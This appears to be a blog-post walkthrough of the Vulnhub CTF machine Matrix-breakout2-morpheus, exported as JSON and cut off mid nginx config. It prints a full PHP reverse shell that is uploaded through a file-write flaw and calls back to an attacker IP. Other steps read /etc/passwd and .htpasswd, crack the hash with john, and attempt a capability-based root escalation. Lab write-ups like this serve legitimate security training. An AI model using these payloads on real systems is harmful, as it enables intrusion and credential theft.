{"id":741,"date":"2024-07-08T19:00:25","date_gmt":"2024-07-08T11:00:25","guid":{"rendered":"http:\/\/162.14.82.114\/?p=741"},"modified":"2024-07-08T19:00:25","modified_gmt":"2024-07-08T11:00:25","slug":"vulnhub-matrix-breakout2-morpheus","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/741\/07\/08\/2024\/","title":{"rendered":"vulnhub&#8211;Matrix-breakout2-morpheus"},"content":{"rendered":"<h1>Matrix-breakout2-morpheus<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407081853683.png\" alt=\"image-20240707173808588\" \/><\/p>\n<blockquote>\n<p>Note: this target VM needs to be run in VMware!<\/p>\n<\/blockquote>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407081853684.png\" alt=\"image-20240708142755764\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/morpheus]\n\u2514\u2500$ sudo rustscan -a $IP -- -A -sCV -Pn\n[sudo] password for kali: \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/root\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.146.128:80\nOpen 192.168.146.128:81\nOpen 192.168.146.128:22\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n|   256 aa:83:c3:51:78:61:70:e5:b7:46:9f:07:c4:ba:31:e4 (ECDSA)\n|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWNDAE21hrPYFpJ4+PvruHbth1s+HHqXYEKk12tnsBQE90v34m4qITkv\/TFumnzT24uw98ntLc2QnqC1lH3rVA=\n80\/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.51 ((Debian))\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-server-header: Apache\/2.4.51 (Debian)\n|_http-title: Morpheus:1\n81\/tcp open  http    syn-ack ttl 64 nginx 1.18.0\n|_http-server-header: nginx\/1.18.0\n|_http-title: 401 Authorization Required\n| http-auth: \n| HTTP\/1.1 401 Unauthorized\\x0D\n|_  Basic realm=Meeting Place\nMAC Address: 00:0C:29:1C:23:31 (VMware)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nOS fingerprint not ideal because: Missing a closed TCP port so results incomplete\nAggressive OS guesses: Linux 5.0 - 5.5 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)\nNo exact OS matches for host (test conditions non-ideal).\nTCP\/IP 
fingerprint:\nSCAN(V=7.94SVN%E=4%D=7\/8%OT=22%CT=%CU=42132%PV=Y%DS=1%DC=D%G=N%M=000C29%TM=668B877E%P=x86_64-pc-linux-gnu)\nSEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)\nOPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4ST11NW6%O6=M5B4ST11)\nWIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)\nECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW6%CC=Y%Q=)\nT1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)\nT2(R=N)\nT3(R=N)\nT4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)\nT5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)\nT6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)\nT7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)\nU1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)\nIE(R=Y%DFI=N%T=40%CD=S)\n\nUptime guess: 44.021 days (since Sat May 25 01:59:30 2024)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=261 (Good luck!)\nIP ID Sequence Generation: All zeros\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.52 ms 192.168.146.128<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/morpheus]\n\u2514\u2500$ gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/$IP -f -x php,bak,zip,html.txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.146.128\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,bak,zip,html.txt\n[+] Add Slash:               true\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in 
directory enumeration mode\n===============================================================\n\/.html.txt\/           (Status: 403) [Size: 280]\n\/.php\/                (Status: 403) [Size: 280]\n\/icons\/               (Status: 403) [Size: 280]\n\/javascript\/          (Status: 403) [Size: 280]\n\/graffiti.php\/        (Status: 200) [Size: 451]\n\/.php\/                (Status: 403) [Size: 280]\n\/.html.txt\/           (Status: 403) [Size: 280]\n\/server-status\/       (Status: 403) [Size: 280]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/morpheus]\n\u2514\u2500$ curl -v http:\/\/$IP                            \n*   Trying 192.168.146.128:80...\n* Connected to 192.168.146.128 (192.168.146.128) port 80\n> GET \/ HTTP\/1.1\n> Host: 192.168.146.128\n> User-Agent: curl\/8.5.0\n> Accept: *\/*\n> \n&lt; HTTP\/1.1 200 OK\n&lt; Date: Mon, 08 Jul 2024 06:30:31 GMT\n&lt; Server: Apache\/2.4.51 (Debian)\n&lt; Last-Modified: Thu, 28 Oct 2021 06:24:12 GMT\n&lt; ETag: &quot;15c-5cf63c252ab85&quot;\n&lt; Accept-Ranges: bytes\n&lt; Content-Length: 348\n&lt; Vary: Accept-Encoding\n&lt; Content-Type: text\/html\n&lt; \n&lt;html&gt;\n        &lt;head&gt;&lt;title&gt;Morpheus:1&lt;\/title&gt;&lt;\/head&gt;\n        &lt;body&gt;\n                Welcome to the Boot2Root CTF, Morpheus:1.\n                &lt;p&gt;\n                You play Trinity, trying to investigate a computer on the \n                Nebuchadnezzar that Cypher has locked everyone else out of, at least for ssh.\n                &lt;p&gt;\n                Good luck!\n\n                - @jaybeale from @inguardians\n                &lt;p&gt;\n                &lt;img src=&quot;trinity.jpeg&quot;&gt;\n        
&lt;\/body&gt;\n&lt;\/html&gt;\n* Connection #0 to host 192.168.146.128 left intact\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/morpheus]\n\u2514\u2500$ curl -v http:\/\/$IP:81\n*   Trying 192.168.146.128:81...\n* Connected to 192.168.146.128 (192.168.146.128) port 81\n> GET \/ HTTP\/1.1\n> Host: 192.168.146.128:81\n> User-Agent: curl\/8.5.0\n> Accept: *\/*\n> \n&lt; HTTP\/1.1 401 Unauthorized\n&lt; Server: nginx\/1.18.0\n&lt; Date: Mon, 08 Jul 2024 06:33:35 GMT\n&lt; Content-Type: text\/html\n&lt; Content-Length: 179\n&lt; Connection: keep-alive\n&lt; WWW-Authenticate: Basic realm=&quot;Meeting Place&quot;\n&lt; \n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;401 Authorization Required&lt;\/title&gt;&lt;\/head&gt;\n&lt;body&gt;\n&lt;center&gt;&lt;h1&gt;401 Authorization Required&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.18.0&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n* Connection #0 to host 192.168.146.128 left intact<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407081853686.png\" alt=\"image-20240708143429179\" \/><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407081853687.png\" alt=\"image-20240708143455070\" \/><\/p>\n<h3>Sensitive Directories<\/h3>\n<p>The scan turned up a few sensitive paths; let's take a look at them:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407081853688.png\" alt=\"image-20240708143839956\" \/><\/p>\n<p>Viewing the page source reveals a <code>.txt<\/code> file with the same name:<\/p>\n<pre><code class=\"language-html\">&lt;form method=&quot;post&quot;&gt;\n&lt;label&gt;Message&lt;\/label&gt;&lt;div&gt;&lt;input type=&quot;text&quot; name=&quot;message&quot;&gt;&lt;\/div&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;file&quot; value=&quot;graffiti.txt&quot;&gt;\n&lt;div&gt;&lt;button 
type=&quot;submit&quot;&gt;Post&lt;\/button&gt;&lt;\/div&gt;\n&lt;\/form&gt;\n<\/code><\/pre>\n<pre><code class=\"language-bash\">http:\/\/192.168.146.128\/graffiti.txt\nMouse here - welcome to the Nebby!\n\nMake sure not to tell Morpheus about this graffiti wall.\nIt&#039;s just here to let us blow off some steam.<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407081853689.png\" alt=\"image-20240708164851546\" \/><\/p>\n<p>The posted message shows up on the <code>php<\/code> page, so we can try writing a reverse shell into a new file.<\/p>\n<h3>Uploading a Reverse Shell<\/h3>\n<p>Let's capture the request first:<\/p>\n<pre><code class=\"language-http\">POST \/graffiti.php HTTP\/1.1\nHost: 192.168.146.128\nContent-Length: 32\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.146.128\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.146.128\/graffiti.php\nAccept-Encoding: gzip, 
deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nmessage=whoami&amp;file=graffiti.txt<\/code><\/pre>\n<p>Now let's upload a reverse shell!<\/p>\n<pre><code class=\"language-http\">POST \/graffiti.php HTTP\/1.1\nHost: 192.168.146.128\nContent-Length: 4062\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.146.128\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.146.128\/graffiti.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nmessage=&lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.146.131&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;\n  $write_a = null;\n  $error_a = null;\n  $shell = &#039;uname -a; w; id; \/bin\/sh -i&#039;;\n  $daemon = 0;\n  $debug = 0;\n\n  \/\/\n  \/\/ Daemonise ourself if possible to avoid zombies later\n  \/\/\n\n  \/\/ pcntl_fork is hardly ever available, but will allow us to daemonise\n  \/\/ our php process and avoid zombies.  
Worth a try...\n  if (function_exists(&#039;pcntl_fork&#039;)) {\n    \/\/ Fork and have the parent process exit\n    $pid = pcntl_fork();\n\n    if ($pid == -1) {\n      printit(&quot;ERROR: Can&#039;t fork&quot;);\n      exit(1);\n    }\n\n    if ($pid) {\n      exit(0);  \/\/ Parent exits\n    }\n\n    \/\/ Make the current process a session leader\n    \/\/ Will only succeed if we forked\n    if (posix_setsid() == -1) {\n      printit(&quot;Error: Can&#039;t setsid()&quot;);\n      exit(1);\n    }\n\n    $daemon = 1;\n  } else {\n    printit(&quot;WARNING: Failed to daemonise.  This is quite common and not fatal.&quot;);\n  }\n\n  \/\/ Change to a safe directory\n  chdir(&quot;\/&quot;);\n\n  \/\/ Remove any umask we inherited\n  umask(0);\n\n  \/\/\n  \/\/ Do the reverse shell...\n  \/\/\n\n  \/\/ Open reverse connection\n  $sock = fsockopen($ip, $port, $errno, $errstr, 30);\n  if (!$sock) {\n    printit(&quot;$errstr ($errno)&quot;);\n    exit(1);\n  }\n\n  \/\/ Spawn shell process\n  $descriptorspec = array(\n    0 =&gt; array(&quot;pipe&quot;, &quot;r&quot;),  \/\/ stdin is a pipe that the child will read from\n    1 =&gt; array(&quot;pipe&quot;, &quot;w&quot;),  \/\/ stdout is a pipe that the child will write to\n    2 =&gt; array(&quot;pipe&quot;, &quot;w&quot;)   \/\/ stderr is a pipe that the child will write to\n  );\n\n  $process = proc_open($shell, $descriptorspec, $pipes);\n\n  if (!is_resource($process)) {\n    printit(&quot;ERROR: Can&#039;t spawn shell&quot;);\n    exit(1);\n  }\n\n  \/\/ Set everything to non-blocking\n  \/\/ Reason: Occsionally reads will block, even though stream_select tells us they won&#039;t\n  stream_set_blocking($pipes[0], 0);\n  stream_set_blocking($pipes[1], 0);\n  stream_set_blocking($pipes[2], 0);\n  stream_set_blocking($sock, 0);\n\n  printit(&quot;Successfully opened reverse shell to $ip:$port&quot;);\n\n  while (1) {\n    \/\/ Check for end of TCP connection\n    if (feof($sock)) {\n      printit(&quot;ERROR: Shell 
connection terminated&quot;);\n      break;\n    }\n\n    \/\/ Check for end of STDOUT\n    if (feof($pipes[1])) {\n      printit(&quot;ERROR: Shell process terminated&quot;);\n      break;\n    }\n\n    \/\/ Wait until a command is end down $sock, or some\n    \/\/ command output is available on STDOUT or STDERR\n    $read_a = array($sock, $pipes[1], $pipes[2]);\n    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n    \/\/ If we can read from the TCP socket, send\n    \/\/ data to process&#039;s STDIN\n    if (in_array($sock, $read_a)) {\n      if ($debug) printit(&quot;SOCK READ&quot;);\n      $input = fread($sock, $chunk_size);\n      if ($debug) printit(&quot;SOCK: $input&quot;);\n      fwrite($pipes[0], $input);\n    }\n\n    \/\/ If we can read from the process&#039;s STDOUT\n    \/\/ send data down tcp connection\n    if (in_array($pipes[1], $read_a)) {\n      if ($debug) printit(&quot;STDOUT READ&quot;);\n      $input = fread($pipes[1], $chunk_size);\n      if ($debug) printit(&quot;STDOUT: $input&quot;);\n      fwrite($sock, $input);\n    }\n\n    \/\/ If we can read from the process&#039;s STDERR\n    \/\/ send data down tcp connection\n    if (in_array($pipes[2], $read_a)) {\n      if ($debug) printit(&quot;STDERR READ&quot;);\n      $input = fread($pipes[2], $chunk_size);\n      if ($debug) printit(&quot;STDERR: $input&quot;);\n      fwrite($sock, $input);\n    }\n  }\n\n  fclose($sock);\n  fclose($pipes[0]);\n  fclose($pipes[1]);\n  fclose($pipes[2]);\n  proc_close($process);\n\n  \/\/ Like print, but does nothing if we&#039;ve daemonised ourself\n  \/\/ (I can&#039;t figure out how to redirect STDOUT like a proper daemon)\n  function printit ($string) {\n    if (!$daemon) {\n      print &quot;$string\n&quot;;}}?&gt;&amp;file=revshell.php<\/code><\/pre>\n<p>Just send the upload:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407081853690.png\" alt=\"image-20240708165403560\" \/><\/p>\n<p>Then visit <code>http:\/\/192.168.146.128\/revshell.php<\/code> to trigger it:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407081853691.png\" alt=\"image-20240708165625619\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root     root     4096 Oct 28  2021 .\ndrwxr-xr-x 13 root     root     4096 Oct 28  2021 ..\ndrwxr-xr-x  2 www-data www-data 4096 Jul  8 08:53 html\n(remote) www-data@morpheus:\/var\/www$ cd html\n(remote) www-data@morpheus:\/var\/www\/html$ ls -la\ntotal 448\ndrwxr-xr-x 2 
www-data www-data   4096 Jul  8 08:53 .\ndrwxr-xr-x 3 root     root       4096 Oct 28  2021 ..\n-rw-r--r-- 1 www-data www-data 381359 Oct 28  2021 .cypher-neo.png\n-rw-r--r-- 1 www-data www-data    770 Oct 28  2021 graffiti.php\n-rw-r--r-- 1 www-data www-data   4047 Jul  8 08:51 graffiti.txt\n-rw-r--r-- 1 www-data www-data    348 Oct 28  2021 index.html\n-rw-r--r-- 1 www-data www-data   4037 Jul  8 08:53 revshell.php\n-rw-r--r-- 1 www-data www-data     47 Oct 28  2021 robots.txt\n-rw-r--r-- 1 www-data www-data  44297 Oct 28  2021 trinity.jpeg<\/code><\/pre>\n<p>A hidden file was found.<\/p>\n<h3>Hidden File Analysis<\/h3>\n<p>Lucky: found something good right away!!!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/morpheus]\n\u2514\u2500$ stegseek .cypher-neo.png \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[!] error: the file format of the file &quot;.cypher-neo.png&quot; is not supported.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/morpheus]\n\u2514\u2500$ binwalk .cypher-neo.png  \n\nDECIMAL       HEXADECIMAL     DESCRIPTION\n--------------------------------------------------------------------------------\n0             0x0             PNG image, 853 x 480, 8-bit\/color RGBA, non-interlaced\n138           0x8A            Zlib compressed data, best compression<\/code><\/pre>\n<h3>Second Round of Information Gathering<\/h3>\n<p>Nothing in there; let's keep gathering information:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/var\/nginx\/html$ cat .htpasswd \ncypher:$apr1$e9o8Y7Om$5zgDW6WOO6Fl8rCC7jpvX0<\/code><\/pre>\n<p>Let's try cracking it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/morpheus]\n\u2514\u2500$ echo 
&#039;cypher:$apr1$e9o8Y7Om$5zgDW6WOO6Fl8rCC7jpvX0&#039; &gt; hash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/morpheus]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash    \nWarning: detected hash type &quot;md5crypt&quot;, but the string is also recognized as &quot;md5crypt-long&quot;\nUse the &quot;--format=md5crypt-long&quot; option to force loading these as that type instead\nUsing default input encoding: UTF-8\nLoaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256\/256 AVX2 8x3])\nWill run 4 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n0g 0:00:00:57 DONE (2024-07-08 05:09) 0g\/s 243734p\/s 243734c\/s 243734C\/s !!!0mc3t..*7\u00a1Vamos!\nSession completed.<\/code><\/pre>\n<p>That didn't succeed, so let's gather another round of information.<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/$ cat FLAG.txt \nFlag 1!\n\nYou&#039;ve gotten onto the system.  Now why has Cypher locked everyone out of it?\n\nCan you find a way to get Cypher&#039;s password? 
It seems like he gave it to \nAgent Smith, so Smith could figure out where to meet him.\n\nAlso, pull this image from the webserver on port 80 to get a flag.\n\n\/.cypher-neo.png<\/code><\/pre>\n<p>Hmm, the order I found these in seems off....<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@morpheus:\/$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/sbin\/xtables-legacy-multi\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) www-data@morpheus:\/$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nnginx:x:999:999:nginx:\/var\/nginx:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System 
(admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nmessagebus:x:101:101::\/nonexistent:\/usr\/sbin\/nologin\nuuidd:x:102:102::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:103:103::\/nonexistent:\/usr\/sbin\/nologin\n_chrony:x:104:104:Chrony daemon,,,:\/var\/lib\/chrony:\/usr\/sbin\/nologin\nsystemd-network:x:105:106:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:106:107:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:107:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-timesync:x:999:999:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nsystemd-coredump:x:998:998:systemd Core Dumper:\/:\/usr\/sbin\/nologin\ntrinity:x:1000:1000::\/home\/trinity:\/bin\/bash\ncypher:x:1001:1001::\/home\/cypher:\/bin\/bash\n(remote) www-data@morpheus:\/$ cd \/home\/cypher\/\nbash: cd: \/home\/cypher\/: Permission denied\n(remote) www-data@morpheus:\/$ cd \/home\/trinity\/\n(remote) www-data@morpheus:\/home\/trinity$ ls -la\ntotal 20\ndrwxr-xr-x 2 trinity trinity 4096 Oct 28  2021 .\ndrwxr-xr-x 4 root    root    4096 Oct 28  2021 ..\n-rw-r--r-- 1 trinity trinity  220 Aug  4  2021 .bash_logout\n-rw-r--r-- 1 trinity trinity 3526 Aug  4  2021 .bashrc\n-rw-r--r-- 1 trinity trinity  807 Aug  4  2021 .profile\n(remote) www-data@morpheus:\/home\/trinity$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/python3-9 cap_sys_admin=ep\n\/usr\/bin\/ping cap_net_raw=ep\n\/usr\/sbin\/xtables-legacy-multi cap_net_admin=ep\n\/usr\/sbin\/xtables-nft-multi cap_net_admin=ep<\/code><\/pre>\n<p>A binary with the cap_sys_admin capability was found; see https:\/\/gtfobins.github.io\/gtfobins\/python\/#capabilities<\/p>\n<p>Let's see whether it can be executed:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/home\/trinity$ \/usr\/bin\/python3-9 -c &#039;import os; os.setuid(0); 
os.system(&quot;\/bin\/bash&quot;)&#039;\nbash: \/usr\/bin\/python3-9: Permission denied\n(remote) www-data@morpheus:\/home\/trinity$ ls -la \/usr\/bin\/python3-9\n-rwxr-x--- 1 root humans 5479736 Oct 28  2021 \/usr\/bin\/python3-9<\/code><\/pre>\n<p>Looks like we first need to get <code>humans<\/code> group privileges.....<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/home$ find \/ -user humans 2&gt;\/dev\/null | grep -v proc\n(remote) www-data@morpheus:\/home$ find \/ -group humans 2&gt;\/dev\/null | grep -v proc\n\/usr\/bin\/python3-9\n\/crew\n(remote) www-data@morpheus:\/home$ ls -la \/crew\ntotal 8\ndrwxrwxr-x  2 root humans 4096 Oct 28  2021 .\ndrwxr-xr-x 19 root root   4096 Oct 28  2021 ..\n(remote) www-data@morpheus:\/home$ cat \/etc\/passwd | grep &#039;humans&#039;<\/code><\/pre>\n<p>Nothing at all. Digging further, I remembered port 81 from earlier; not knowing whether it hides anything, let's search there:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/etc\/nginx\/sites-enabled$ cat default \n##\n# You should look at the following URL&#039;s in order to grasp a solid understanding\n# of Nginx configuration files in order to fully unleash the power of Nginx.\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/topics\/tutorials\/config_pitfalls\/\n# https:\/\/wiki.debian.org\/Nginx\/DirectoryStructure\n#\n# In most cases, administrators will remove this file from sites-enabled\/ and\n# leave it as reference inside of sites-available where it will continue to be\n# updated by the nginx packaging team.\n#\n# This file will automatically load configuration files provided by other\n# applications, such as Drupal or WordPress. 
These applications will be made\n# available underneath a path with that package name, such as \/drupal8.\n#\n# Please see \/usr\/share\/doc\/nginx-doc\/examples\/ for more detailed examples.\n##\n\n# Default server configuration\n#\nserver {\n        listen 81 default_server;\n        listen [::]:81 default_server;\n\n        # SSL configuration\n        #\n        # listen 443 ssl default_server;\n        # listen [::]:443 ssl default_server;\n        #\n        # Note: You should disable gzip for SSL traffic.\n        # See: https:\/\/bugs.debian.org\/773332\n        #\n        # Read up on ssl_ciphers to ensure a secure configuration.\n        # See: https:\/\/bugs.debian.org\/765782\n        #\n        # Self signed certs generated by the ssl-cert package\n        # Don&#039;t use them in a production server!\n        #\n        # include snippets\/snakeoil.conf;\n\n        root \/var\/nginx\/html;\n\n        auth_basic &quot;Meeting Place&quot;;\n        auth_basic_user_file \/var\/nginx\/html\/.htpasswd;\n\n        # Add index.php to the list if you are using PHP\n        index index.html index.htm index.nginx-debian.html;\n\n        server_name _;\n\n        location \/ {\n                # First attempt to serve request as file, then\n                # as directory, then fall back to displaying a 404.\n                try_files $uri $uri\/ =404;\n        }\n\n        # pass PHP scripts to FastCGI server\n        #\n        #location ~ \\.php$ {\n        #       include snippets\/fastcgi-php.conf;\n        #\n        #       # With php-fpm (or other unix sockets):\n        #       fastcgi_pass unix:\/run\/php\/php7.4-fpm.sock;\n        #       # With php-cgi (or other tcp sockets):\n        #       fastcgi_pass 127.0.0.1:9000;\n        #}\n\n        # deny access to .htaccess files, if Apache&#039;s document root\n        # concurs with nginx&#039;s one\n        #\n        #location ~ \/\\.ht {\n        #       deny all;\n        #}\n}\n\n# Virtual Host 
